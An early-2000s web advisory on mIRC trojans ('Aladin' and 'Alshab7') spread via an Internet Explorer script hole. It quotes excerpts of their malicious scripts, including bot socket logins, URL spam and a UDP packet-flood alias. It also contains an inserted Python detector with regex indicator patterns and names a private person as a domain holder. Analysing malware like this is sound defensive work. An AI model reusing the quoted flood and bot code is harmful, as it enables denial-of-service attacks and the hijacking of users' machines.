Alert to the Kuwaiti worm!!!


Recently (at the beginning of January 2002), a new wave of very malicious trojan horses has been spreading over the Internet. They all seem to have been created by a young Kuwaiti, but nothing is certain, since hackers like to scramble the clues. These trojans propagate neither by e-mail nor by conventional DCC sends over IRC: their infection method is much more clever and transparent.

How can I be infected?

By simply surfing the Web! And that because of a security hole which is now well known, and which Microsoft fixed more than a year ago. If you are in the habit of visiting websites that unknown persons on IRC advertise through private messages, be aware that you have probably downloaded and executed a very malicious VBS script.

I have collected on this website some infected HTML pages that I found. Of course, these pages are hosted within this site, and the malicious code has been removed. If you have already seen one of these pages (the list is not exhaustive), please read the rest carefully...

  • Page on ayna.com (recently removed)
  • Page on geocities
  • Page on homepagez
  • Page on stormpages

What does this trojan do, and how does it work?

    The mechanism of such a trojan is particularly clever: it works in 5 stages:

    1) You first receive an automatic invitation on IRC to visit an infected website. You then decide to visit this site.
    2) Once the web page is downloaded, a JavaScript included in the source code writes a .vbs file (Windows Scripting Host language) onto your hard disk and executes it. Yes, this is unfortunately possible: JavaScript writing to your hard disk! The infectious JavaScript uses a well-known security hole in Windows and Internet Explorer. This hole has been named JS.Exception.Exploit, and was discovered at the end of the year 2000. Most of you are still using Windows 98 and have never thought to download Microsoft's security patches... Unfortunately, that is what the hacker has counted on. By contrast, I think that WinXP users are safe.
    3) Once executed by the JavaScript, the .vbs file, whose code is fairly complicated, inserts a .ini file in your mIRC folder. Moreover, it modifies mirc.ini so that this file is then loaded by mIRC. The next time mIRC is launched, the script can work properly.
    4) When you connect to your regular server (an Undernet server, for example), the script is launched by the ON CONNECT event and discreetly opens a socket, without your suspecting it, to a Kuwaiti IRC server. The address of that server depends on the virus: I have currently indexed two servers: irc.q8sharks.org and irc.alshab7.com. The IP address of this connection is evidently yours; the script then joins a secret channel on this server, whose name also depends on the virus you have got.
    5) At this point, the purposes of the scripts differ; I have indexed two kinds of script: the first, which I have found to be particularly malicious and have named Aladin, and the second, which I have named Alshab7. But I know that there are other kinds, unfortunately!

    In any case, under the orders of the channel operator (probably the creator of the worm), the mIRC script will control your actions and execute some tasks.

    Aladin variant: the hacker will make you download and execute some .exe applications available on the web, especially the 618K file crack.exe which was recently available on http://home.dal.net/madlover/. (This website was closed on 25/01/02, with the help of a friend who has a strong influence in the DALnet community.) The mIRC script contains all the commands needed to download binary files from the Web, using sockets and binary variables for this purpose. I really don't know what this file crack.exe is able to do on your computer!! Perhaps allowing FTP sessions on your hard disk, perhaps (more likely) turning you into one or more clonebots in order to attack channels on any IRC server by flooding them, without your being aware of it. I recently counted, for example, about 400 hacked connections in the channel on Aladin's server, just when I joined it. This script is very powerful!

    Alshab7 variant: the script is unable to download files, but it was created to connect one or more sockets to an IRC server chosen by the hacker and to flood channels, also chosen by him. The purpose of such a script is evidently to create an army of clones, all having different IP addresses (yours), without the knowledge of the infected user.

How can I know if I am infected?

    Firstly, I have created a web page to test your vulnerability to the security hole. It deliberately reproduces the trojan's process without causing any damage to your hard disk: it will only display a text in Notepad if it works. Your antivirus may detect a trojan and then prevent you from downloading the page. If so, that is good!

    Be careful anyway, since I have received some reports that this web page could completely crash your operating system (blue screen), particularly if you are using Norton Antivirus. You have been warned!

    To test your vulnerability, please click here


    To know if you are already infected, there is more than one clue: firstly, the script sends private messages ON JOIN and sometimes ON PART, advertising a web page containing the malicious code. Secondly, for those who have unfortunately been victims of the Aladin variant, you should have a file named crack.exe in your mIRC download folder. Finally, you should have an additional script in your mIRC application, probably named server.ini, containing instructions related to socket connections. For those who are not used to scripting, press Alt-R, select the View menu, then look in the popup to see the list of currently active scripts.
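    The manual check above (Alt-R, View menu) can be done offline against a copy of the mIRC folder. The following Python script is an added example, not code from this site: it reads the [rfiles] section of mirc.ini (the hook the dropped .vbs alters, stage 3 above) and scores each loaded script for the traits described in stages 4-5 and in the clues above (autostart event, raw NICK/USER over a socket, sockudp loops, URL spam on JOIN/PART). The sample profile, the rule weights and the threshold are constructed assumptions.

```python
import re

# Assumption: mIRC lists loaded remote scripts under [rfiles] in mirc.ini
# (n0=..., n1=...), the hook the dropped .vbs alters. Rules: (name, regex, weight).
RULES = [
    ("autostart event", re.compile(r"^on\s+\S+:(START|CONNECT):", re.I | re.M), 2),
    ("raw IRC login over socket",
     re.compile(r"sockwrite\s+-\w+\s+\$sockname\s+(NICK|USER)\b", re.I), 3),
    ("socket event handler", re.compile(r"^on\s+\S+:sock(open|read|close):", re.I | re.M), 1),
    ("udp packet loop", re.compile(r"\bsockudp\b", re.I), 3),
    ("url spam on join/part",
     re.compile(r"^on\s+\S+:(JOIN|PART):.*\bmsg\s+\$nick\b.*https?://", re.I | re.M), 3),
]

def loaded_scripts(mirc_ini):
    """File names listed under [rfiles] in mirc.ini text, in load order."""
    files, in_rfiles = [], False
    for line in mirc_ini.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_rfiles = line.lower() == "[rfiles]"
        elif in_rfiles and "=" in line:
            files.append(line.split("=", 1)[1].strip())
    return files

def score_script(text):
    """Return (score, matched indicator names) for one script's text."""
    hits = [(name, weight) for name, rx, weight in RULES if rx.search(text)]
    return sum(w for _, w in hits), [n for n, _ in hits]

def triage(mirc_ini, scripts, threshold=4):
    """Map each loaded script scoring at or above threshold to its indicators."""
    flagged = {}
    for name in loaded_scripts(mirc_ini):
        score, hits = score_script(scripts.get(name, ""))
        if score >= threshold:
            flagged[name] = hits
    return flagged

# Constructed sample profile, not a real capture: one benign script and one
# mimicking the dropped server.ini; alias and variable names are placeholders.
SAMPLE_INI = "[mirc]\nnick=someone\n\n[rfiles]\nn0=aliases.ini\nn1=server.ini\n"
SAMPLE_SCRIPTS = {
    "aliases.ini": "alias slap { /me slaps $1 with a large trout }\n",
    "server.ini": "on 1:START:{ if ($ip != 127.0.0.1) { //bootbot } }\n"
                  "on *:sockopen:bot*:{ .sockwrite -nt $sockname NICK %user }\n",
}

if __name__ == "__main__":
    print(triage(SAMPLE_INI, SAMPLE_SCRIPTS))
```

    On a real profile, read mirc.ini and each listed file from the mIRC folder into the two arguments; a flagged script should then be unloaded and its socket connections closed as described further down.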

    For information, I have reproduced below the beginning of the code of the Aladin variant:


    on 1:START:{ if ($ip != 127.0.0.1) { //sskk } }
    on *:sockclose:bot*:/.timers off | /.timer 1 3 //sskk
    on *:Sockopen:bot*:{
    if ($sockerr > 0) { halt }
    set -u1 %user BaBa-0 $+ $rand(1,99999)
    .sockwrite -nt $sockname USER %user %user %user : $+ $me
    .sockwrite -nt $sockname NICK %user
    .sockwrite -tn $sockname join #Knight | .timer $+ AntiTimeOut 0 50 .sockwrite -nt $sockname PRIVMSG %user : $+ 15reHuShing
    }
    ...


    Below is the beginning of the Alshab7 variant code:


    on 1:JOIN:#:/msg $nick 4,1http://www.storm0pages.com/xks4x/Ghost.html 0<=- Çæá ãæÞÚ ÊæÌÏ Èå ÌãíÚ ÇÔßÇá ÇáÌä
    on 1:part:#:/msg $nick 4,1http://www.storm0pages.com/xks4x/Ghost.html 0<=- Çæá ãæÞÚ ÊæÌÏ Èå ÌãíÚ ÇÔßÇá ÇáÌä
    alias packt { .sockwrite -n $sockname privmsg # : $+ Now [Packeting] $1 [with] $2 [bytes] $3 [times] | set %packet.ip $1 | set %packet.bytes $2 | set %packet.amount $3 | set %packet.count 0 | set %packet.port $rand(1,6) $+ $rand(0,6) $+ ($rand(0,6) $+ $rand(0,9) | :start | if (%packet.count >= %packet.amount) { sockclose packet | unset %packet.* | .sockwrite -n $sockname privmsg #1478 : $+ Packeting Has Completed .... | halt } | inc %packet.count 1| /.sockudp -b packet 60 %packet.ip %packet.port %packet.bytes %packet.bytes | goto start }
    on *:TEXT:*www*:?:{ var %invito = $comchan($nick,0) | closemsg $nick | ignore $nick }
    on *:TEXT:*http*:?:{ var %invito = $comchan($nick,0) | closemsg $nick | ignore $nick }
    on *:sockread:bo*: { sockread %botread | set %nickl1 $gettok(%botread,1,32) | set %nickl2 $left(%nickl1,8) | set %nickf $right(%nickl2,7) | if ($gettok(%botread,5,32) == ALShaB7) && (%nickf == ALShaB7) { $gettok(%botread,6-,32) } }
    ...


    Fuck!! I have got one of these scripts!! What can I do?

    Don't panic, but be careful anyway, since I have no clue what the file crack.exe could do on your computer, nor what the hacker could additionally make you download and execute, if you have the Aladin variant. I cannot assure you that your computer has not been visited, or perhaps modified. I recently sent an e-mail to Symantec to alert them about this trojan, giving them all the URLs quoted above. Hopefully they will quickly find a way to eradicate the effects of crack.exe. Moreover, if you know whom I could speak to about it, please feel free to send me an e-mail. The only thing I advise you to do in any case is firstly to unload the script ( /unload -rs server.ini ), then close all your socket connections ( /sockclose * ).

    Last news

    I recently found a server realserver.q80.net port 3257 with an IRCop named Aladin, and a channel #aladinizback full of hacked connections.

    What seems certain is that the same person likely wrote all of these malicious codes, since the servers to which the hacked users connect, in each of these variants, have domain names owned by the e-enterprise Kuwaitnet.

    The IRC server of the Aladin variant is indeed irc.q8sharks.org and the IRC server of the Alshab7 variant is irc.alshab7.com. These two domain names have been rented by a certain Bashar AlAbdulhadi, who is currently the administrator of the Kuwaitnet network.

    I sent an e-mail to AlAbdulhadi to inform him that the domains q8sharks.org and alshab7.com were rented (or hacked) in order to serve a hacker, and he promised me to "do the proper action". If he closes the IRC servers quoted above, there is no more risk for the infected people.

    It is now fairly certain that the hacker's nationality is Kuwaiti, because he has chosen Kuwaiti domain names and has used Arabic web pages to infect people. Moreover, a friend of mine who helped me a lot in my enquiry recently chatted with the hacker: his computer clock gave a time corresponding to the Kuwaiti time zone (French time + 2h).

    Real or false clues? To be followed....